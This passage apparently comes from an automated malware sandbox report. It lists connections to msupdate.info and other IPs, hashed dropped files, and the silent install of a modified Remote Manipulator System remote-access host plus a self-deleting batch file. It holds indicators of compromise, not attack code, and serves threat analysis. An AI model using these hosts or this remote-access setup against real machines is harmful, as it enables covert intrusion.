| LT | 5.133.65.53:443 | msupdate.info | tcp |
| LT | 5.133.65.53:80 | msupdate.info | tcp |
| N/A | 127.0.0.1:999 | tcp | |
| N/A | 127.0.0.1:999 | tcp | |
| N/A | 127.0.0.1:999 | tcp | |
| N/A | 127.0.0.1:5650 | tcp | |
| RU | 77.247.243.43:5655 | tcp | |
| LT | 5.133.65.53:5655 | msupdate.info | tcp |
| LT | 5.133.65.53:443 | msupdate.info | tcp |
Files
memory/1672-55-0x0000000000B70000-0x0000000000B72000-memory.dmp
memory/1672-54-0x000007FEF38B0000-0x000007FEF4946000-memory.dmp
memory/1672-56-0x000007FEF2BC0000-0x000007FEF371D000-memory.dmp
memory/1752-57-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\emin3iva.cmdline
| MD5 | c48e61fcff6e180ea2b5cf1f2f1b8127 |
| SHA1 | 018cec77e80be40eb60b0e5a192d5eb097b4cc7e |
| SHA256 | 03756f486c34a4d88f09cccac8366ab4b7a34fc4f534467036cd3a2c0d18df3e |
| SHA512 | 7c8a017a5f46429cbf0bdf10d801fec6f765d24102ddd6936785e02113040e0ff2ffa9e130e5258e5db2b7d546c94141d74acf67adbf106937510ab82a0020b6 |
\??\c:\Users\Admin\AppData\Local\Temp\emin3iva.0.cs
| MD5 | 1640a04633fee0dfdc7e22c4f4063bf6 |
| SHA1 | 3cb525c47b5dd37f8ee45b034c9452265fba5476 |
| SHA256 | 55e16d2ca3e65ce6c62cd5be2af5d7264445c5d7e1b5f3be7149acfb47ae42a0 |
| SHA512 | 85c5103dda738d6003d39b0b619e68942965ddb9d6e08e544abf377224fdb29c6cd1501a549e99e57875954cea44b5bdefd7cace018c8123e7bfb717ae0e973d |
memory/1340-60-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\CSC56E.tmp
| MD5 | 0efee21fec57eb710313af57a33cd5f5 |
| SHA1 | 9ac02a94785e46d42ee4e55912cddd46b98847aa |
| SHA256 | 3bf26a60321c00838d0cb16dc6c6cf02add5f0b5436238d856473b3ebad70e85 |
| SHA512 | 234ebb165a972ae2aab6a8b47fc8b5a21b6b1577b72303a9e88cf5f255663767ac21856c5a58f326400ef549a93691143ef81ed1f4a1d48cd882b2fd621982ca |
C:\Users\Admin\AppData\Local\Temp\emin3iva.pdb
| MD5 | 77e541f2be743b816a042f5313d4196c |
| SHA1 | eac2b85244a0c8aad387792ee599a3fe3b38e6af |
| SHA256 | 9bf32df3bf7fd36b88b164139ccbd80d2645036910c1fde1eb1d7e1381565b03 |
| SHA512 | 8340fee56d8cbe2d2a76e49083c0ae2ce3aa794172d1e2457b3cfdb4bdaffe847b1bb275948882c0feb3579a20c7434ad7e89302bb53ded3f3b3fd4b60a4b650 |
C:\Users\Admin\AppData\Local\Temp\emin3iva.dll
| MD5 | 835aada007085db85f7fa80554a640a1 |
| SHA1 | 9716caf366e9e53956f06534172cf2f0e553f1c1 |
| SHA256 | 1b19f54545a91180c2f9baa4003db214d0715f19e1e11d0bfdcf02df22450bfe |
| SHA512 | 0e7307082e061b2bffd70977fbb17debbd4a801b5b487c4bac96bc970c7e7768b8801092adbf2622418de103434d3c57f1418c115543ffac86495b6be016b8a1 |
C:\Users\Admin\AppData\Local\Temp\RES56F.tmp
| MD5 | 303299e52ac1904df9ed13f4e5baa254 |
| SHA1 | a59d15be7f983e16bbb7ebdee3a34001031bccb3 |
| SHA256 | 6deeaa1fcec97f204482855007762cc637846fb9c1c1bdd595bbc7ce3132a64a |
| SHA512 | 94570889e876e4c3a75f507a9df055a61a9172acc8db6a14c28854be6f84f9a3ed07fb4df5ddc011bda6186ecdb800750a087db9035584155ce7ab83084f76d1 |
memory/1116-65-0x0000000000000000-mapping.dmp
memory/2012-66-0x000007FEFC5C1000-0x000007FEFC5C3000-memory.dmp
memory/1036-67-0x0000000000000000-mapping.dmp
memory/1876-69-0x0000000000000000-mapping.dmp
memory/1052-70-0x0000000000000000-mapping.dmp
memory/1272-71-0x0000000000000000-mapping.dmp
memory/2004-72-0x0000000000000000-mapping.dmp
memory/1580-74-0x0000000000000000-mapping.dmp
memory/1268-76-0x0000000000000000-mapping.dmp
memory/932-78-0x0000000000000000-mapping.dmp
memory/1672-80-0x0000000000B9D000-0x0000000000B9F000-memory.dmp
memory/1672-81-0x000000001B4C0000-0x000000001B4D9000-memory.dmp
memory/1704-82-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\RMS.exe
| MD5 | cb2ffac2a251378cda3f91cd613f453d |
| SHA1 | 3a028761638f5aa93b0719c5650c83a138e8abc9 |
| SHA256 | 10165e27e0db0a6708f346ddea657ab0409499f93eb8426a80864a966f0f401e |
| SHA512 | 1d203540fde5074f0d57e1ecbd9af2ee862b940f8fb58c3e55ad9db5ba029aff82a4468eee24c760b5e55cc96e61244af0fd6f3c46db857824e13e45ec1e802f |
memory/1704-84-0x0000000075AE1000-0x0000000075AE3000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\RMS.exe
| MD5 | cb2ffac2a251378cda3f91cd613f453d |
| SHA1 | 3a028761638f5aa93b0719c5650c83a138e8abc9 |
| SHA256 | 10165e27e0db0a6708f346ddea657ab0409499f93eb8426a80864a966f0f401e |
| SHA512 | 1d203540fde5074f0d57e1ecbd9af2ee862b940f8fb58c3e55ad9db5ba029aff82a4468eee24c760b5e55cc96e61244af0fd6f3c46db857824e13e45ec1e802f |
\Users\Admin\AppData\Local\Temp\7ZipSfx.000\installer.exe
| MD5 | c9704931d887685d96ce92d637d84045 |
| SHA1 | 0875a71e9118ded121d92f3f46a3af1ec8380f8b |
| SHA256 | 0448c45cb43585409002e01ef53442cb9f6ad58f211f5deb3ad2ca8b8d535826 |
| SHA512 | 3b739394f69ec9f26ef607a0d481f1ad3d107462220c2281cbc300f16886ab3d857bee9af59b8857c7e7ae5b04e6a849eaa5e304d6935957a0a15e462375c260 |
memory/1652-87-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\installer.exe
| MD5 | c9704931d887685d96ce92d637d84045 |
| SHA1 | 0875a71e9118ded121d92f3f46a3af1ec8380f8b |
| SHA256 | 0448c45cb43585409002e01ef53442cb9f6ad58f211f5deb3ad2ca8b8d535826 |
| SHA512 | 3b739394f69ec9f26ef607a0d481f1ad3d107462220c2281cbc300f16886ab3d857bee9af59b8857c7e7ae5b04e6a849eaa5e304d6935957a0a15e462375c260 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\installer.exe
| MD5 | c9704931d887685d96ce92d637d84045 |
| SHA1 | 0875a71e9118ded121d92f3f46a3af1ec8380f8b |
| SHA256 | 0448c45cb43585409002e01ef53442cb9f6ad58f211f5deb3ad2ca8b8d535826 |
| SHA512 | 3b739394f69ec9f26ef607a0d481f1ad3d107462220c2281cbc300f16886ab3d857bee9af59b8857c7e7ae5b04e6a849eaa5e304d6935957a0a15e462375c260 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\rms.host6.3.4ru_mod_mod.msi
| MD5 | 998f9b9eefeddbfc898356139220bab3 |
| SHA1 | 324bb9170598a73ce7f1359da7a35a6065f22f8e |
| SHA256 | 0230d36dc995c5fa25b6dd3f33c670fdf5f06c014a0b2d1012c064d733e9d81c |
| SHA512 | efea0f628fca55733a29cd6c05aab11b8b4e49153d9ae94340daa00e5cb47f1ce4c2c2a3d9fea6108205fcb3a13ca13a4d533f47c561e8785f529d58c95f08e7 |
memory/980-92-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | c3009b10641a1f07361fa4c152bff89d |
| SHA1 | 1338aa8040fe8dbf740b54b3750ede4883301b9d |
| SHA256 | 4900c08c7de13ceac616639ab6dd2efad1f9e50d51c7ab11d7e72dff02dcefe2 |
| SHA512 | ae13c7096b18aebf0df94fe5807054e9b3e680ce922e3e1f5dd034259f9f023c5e078a406f2be55ec691929975d4b321311f97a942a7a3cff9d8e2141a3efa6b |
memory/1656-95-0x0000000000000000-mapping.dmp
\Windows\Installer\MSI25C0.tmp
| MD5 | b0bcc622f1fff0eec99e487fa1a4ddd9 |
| SHA1 | 49aa392454bd5869fa23794196aedc38e8eea6f5 |
| SHA256 | b32687eaaad888410718875dcbff9f6a552e29c4d76af33e06e59859e1054081 |
| SHA512 | 1572c1d07df2e9262d05a915d69ec4ebeb92eab50b89ce27dd290fb5a8e1de2c97d9320a3bb006834c98b3f6afcd7d2c29f039d9ca9afaa09c714406dedbc3c7 |
C:\Windows\Installer\MSI25C0.tmp
| MD5 | b0bcc622f1fff0eec99e487fa1a4ddd9 |
| SHA1 | 49aa392454bd5869fa23794196aedc38e8eea6f5 |
| SHA256 | b32687eaaad888410718875dcbff9f6a552e29c4d76af33e06e59859e1054081 |
| SHA512 | 1572c1d07df2e9262d05a915d69ec4ebeb92eab50b89ce27dd290fb5a8e1de2c97d9320a3bb006834c98b3f6afcd7d2c29f039d9ca9afaa09c714406dedbc3c7 |
memory/1556-99-0x0000000000000000-mapping.dmp
C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe
| MD5 | c9704931d887685d96ce92d637d84045 |
| SHA1 | 0875a71e9118ded121d92f3f46a3af1ec8380f8b |
| SHA256 | 0448c45cb43585409002e01ef53442cb9f6ad58f211f5deb3ad2ca8b8d535826 |
| SHA512 | 3b739394f69ec9f26ef607a0d481f1ad3d107462220c2281cbc300f16886ab3d857bee9af59b8857c7e7ae5b04e6a849eaa5e304d6935957a0a15e462375c260 |
C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe
| MD5 | c9704931d887685d96ce92d637d84045 |
| SHA1 | 0875a71e9118ded121d92f3f46a3af1ec8380f8b |
| SHA256 | 0448c45cb43585409002e01ef53442cb9f6ad58f211f5deb3ad2ca8b8d535826 |
| SHA512 | 3b739394f69ec9f26ef607a0d481f1ad3d107462220c2281cbc300f16886ab3d857bee9af59b8857c7e7ae5b04e6a849eaa5e304d6935957a0a15e462375c260 |
memory/1712-103-0x0000000000000000-mapping.dmp
C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe
| MD5 | 18b075903b5d704092e823b234f0f0b9 |
| SHA1 | fe67c8e18d9b3e2e82880361e7755a3925724887 |
| SHA256 | f8fb12f07ec2d36134c1eb506aace6c0ba00791c6174708b75c5e82aef4d3b54 |
| SHA512 | c573d9b1e74c382ee9d391e0a149223862ea06ba5f64b4f838df36c4e92796309d6f772d56655db1939749048a6e6fb3f65d3567cbfb05f88ccf4ff61c7eed0a |
memory/1636-106-0x0000000000000000-mapping.dmp
C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe
| MD5 | 7bcba183b64df175894322d7d19a661b |
| SHA1 | d147ed772cc0d892a03ffd208c60dd2b368e7668 |
| SHA256 | ec43efdab1e8224ebe4dab02c38754f5ae3e1cb0c6e5fffb290de3a243bf806a |
| SHA512 | 980383cc07e77b69c1c0e867653222130c33989ec631af48618428469017a2c5ac1b8e1aeeea9e0ac4dfeb72da25396bc1a66e8bd16c70e2fb05ae7e8efc2edb |
C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe
| MD5 | 12f607ab70576915c89c21c00eafeb1f |
| SHA1 | 8d1321f0f668555b1c34b7c40e66e5e9fbf1cf59 |
| SHA256 | 39a61771d4f91ec8b2afefb76325bf77d058fe2386b6baf01ce881de178bd1bd |
| SHA512 | 3b911d037871bfc34a1871921112532820b08e271363085e61323b27dca80f72003f69691b6e87fc8cdc71547fecfe6861039485d9dfb6d60a1c042f93e5cfca |
memory/1960-111-0x0000000000000000-mapping.dmp
C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe
| MD5 | 997abd06435231a029c6ec87560922ba |
| SHA1 | e9471ae100a145a1e7f54f44292c62801a78ed63 |
| SHA256 | 9a278ab6d9d4fe6dcb2c47e7f4db3a9f77f02b75b71a18d5da4c1d94a44ae5e7 |
| SHA512 | 9cc44ad7bad6d0e037cf01a3d1954a20dcd791aea546e75c11b5de91d739b131f91d1b99317c749be83ae9975cd5ffdfa0a0c3bfde53a2ffc83c3f67a25b6e56 |
C:\Program Files (x86)\Remote Manipulator System - Host\webmvorbisencoder.dll
| MD5 | 9a0e4f39d2cd554fc1d53bdddbf125ab |
| SHA1 | 576cb38657fd0eb5443b0768e1da5c24ab92b81a |
| SHA256 | 4225ee30a1b834ab23b8d2f9833d61480ea00f1fc015b6aeb001cce5095c1cfb |
| SHA512 | c57b5a267256476d6a7a1bb671bc817c65a1ad0097b563c8d6d4184b41388a089b19af44030c147270204b6a29e042939e6dcafa3bae2adbfa9212719bab1c32 |
C:\Program Files (x86)\Remote Manipulator System - Host\webmvorbisdecoder.dll
| MD5 | eeb2c52abbc7eb1c029b7fec45a7f22e |
| SHA1 | 8bfeb412614e3db0a2bf0122f4d68cc27b8c3a61 |
| SHA256 | c0f0b84d587066af8f80f41a7be63b4c01547af3f1e011602ac1b6ee0ac54a2c |
| SHA512 | 0b5b83335c6f602b8397a3c2ae6d1e661d744eb27114463d53e344bf18774ccb38853d314ebe05536d4c28c29fe3fdaba041a6a46983789f064ca70881cfcb85 |
C:\Program Files (x86)\Remote Manipulator System - Host\webmmux.dll
| MD5 | 038bf9f3a58560ad1130eeb85cdc1a87 |
| SHA1 | 3571eb7293a2a3a5bf6eb21e1569cd151d995d1a |
| SHA256 | d247afa3bd1ccc18e11eb099280802a61d3792a2018c476d95debf2091e9707d |
| SHA512 | 8ffa52b358841600b9122974079d22d4e11bc4214316cd85ac4d4af0e369112b6827029f74a9a9d3918db00c7fed3a9a1985e0b43da39783a748d78752ae2385 |
C:\Program Files (x86)\Remote Manipulator System - Host\vp8encoder.dll
| MD5 | 37b1cc9d44de7e1f52e4224f8708fdc8 |
| SHA1 | 6f123077b584c4632570dc296bcd2dc42b25a1ac |
| SHA256 | 0cad23e14eb05860ee78cf54447a4876c9bfefbb6b6f98b36fe5a7882276096b |
| SHA512 | 6db8b9663cbfb2a1d414ea862ca01901a79c18d888de7ceb339125012dcc22e58e50085bcd9ea40b8d3f74206b050e32b59ffd98a6c72bbf3a478697c6192bb9 |
C:\Program Files (x86)\Remote Manipulator System - Host\vp8decoder.dll
| MD5 | 292a1748850d1fdc91d4ec23b02d6902 |
| SHA1 | 8f15f1c24e11c0b45b19c82a78f7b79b1e7f932d |
| SHA256 | acf354ad6ed94e876b29a60c5870dd91e7b3f76cc82c1a862c92024a12404a9f |
| SHA512 | cf7579f1169ec21d9bf3c666d416d3fe2a4f9953d4d328b182452e40043f91055d301fd4b4a21454b847dbdb0af6a61c52657caded7d6fd7e88812aceeacf704 |
C:\Program Files (x86)\Remote Manipulator System - Host\RWLN.dll
| MD5 | 48ffc417a6040055054218f604ceee90 |
| SHA1 | 1236baa037004b3f945ad8ff1b41f95e04007c9f |
| SHA256 | 22baf651dfb1446786129356672467c7328aecfac902ffa42326048ef9794e08 |
| SHA512 | e3e911a8c30dd4cc88c82d4bce3153f119541ae02ccf2e7a12782e3e4fd1f93ffbb831ca8a5a84631ab4a5f9eecc4ec838e6a4ebd7367105feed42524daddf1f |
C:\Program Files (x86)\Remote Manipulator System - Host\RIPCServer.dll
| MD5 | 2ddfa39f5c2fd3f00681ef2970617e4b |
| SHA1 | 8152aa18afbacf398b92168995ec8696d3fe3659 |
| SHA256 | f938bdc741ef1d2738b532aef001a160e3a3627ed8a27158b7017ee49fc65791 |
| SHA512 | f89f0f02cda650c138e4ebaef198f0762dfd571ef7d46a6b3710cd93d76bc52a79055c55afca46128a9a84a795a5cb946ca93c492e07cfb503c9b27d96211e20 |
C:\Program Files (x86)\Remote Manipulator System - Host\Russian.lg
| MD5 | e44e34bc285b709f08f967325d9c8be1 |
| SHA1 | e73f05c6a980ec9d006930c5343955f89579b409 |
| SHA256 | 1d99a7b5f7b3daa61fa773972b1e335aa09b92411484f6ddc99d2b2894455a5b |
| SHA512 | 576b292b6e9cf022822443e050994462a6cbd9a3c60063bae9f54c78a84e75e17bb5eddf7e259a22a9d93f757cb6536c503762e2a30e75091e40c2756cde8727 |
C:\Program Files (x86)\Remote Manipulator System - Host\English.lg
| MD5 | bc25377ade68750b834c81fa71c233b8 |
| SHA1 | 84dbb465dd2125f47668e2508e18af9bd6db2fd8 |
| SHA256 | 9a48a7ea7ba2c2f33280d1e1722ebbc59bf81bc6c5a1f97edca53ea641ffd8e3 |
| SHA512 | 205ab195339d7108adbe6dfabd48e4e21c5956ded587d7213a44618f0d34a43f7b8abaa7765b9d31695efacfc44beeb69fbaa3cb27c141b6a653713fdf5ebce5 |
C:\Users\Admin\AppData\Local\Temp\killself.bat
| MD5 | 2fe7ba7d9103012d8593f220508eaf6a |
| SHA1 | fce4c84da7d0d97b46d494b15acbcd992b04f06a |
| SHA256 | 874044e21f5b7c8a7a2286f1a5c61693515153e73c019451f32a0df1bb910708 |
| SHA512 | 9fb05799d464f26097c84d4b6dbb18de6de360f62a4373849fc6c7bc7348dc0738f702bcd3dbfa3bde4e1cb9275898ee33eb03706d419d2029a4a8fd3f983678 |
\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe
| MD5 | 975914cee6b796471c859252956c9a51 |
| SHA1 | fca86c05aec5317ea8dd801b7a9755862d262261 |
| SHA256 | 3cbf3a0bc2431dd7b89deddbcad8cfbf4ad46106104702ee36d12fdcb79e8258 |
| SHA512 | 8616dd3b7e5d689e8268b610ec87f0f00e1348f6fe7bd8ef9746087fd4280cc4362448cdf7c153d5cceb796a49a4b39971154ee2ce82b1bb3144576bf2b6bb13 |
memory/1576-125-0x0000000000000000-mapping.dmp
\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe
| MD5 | 67b750fbb56645a789668b912f8f0f07 |
| SHA1 | 99e27952d3a5c71b6e266ec143471952b7b96565 |
| SHA256 | c1c946b663130d71b25c1b278195199ba40669a82235de924172656fbd871b2a |
| SHA512 | d0d25db7da45ac0443dbc7fb0f9c7f8b102587d6bb9060b6fb4f3ac0ab916bed70b3137ca83cac595716aff383b7cd843f760fdb158123727da92a9e7f578d71 |
Analysis: behavioral2
Detonation Overview
Submitted
2022-04-19 04:09
Reported
2022-04-19 04:10
Platform
win10v2004-20220310-en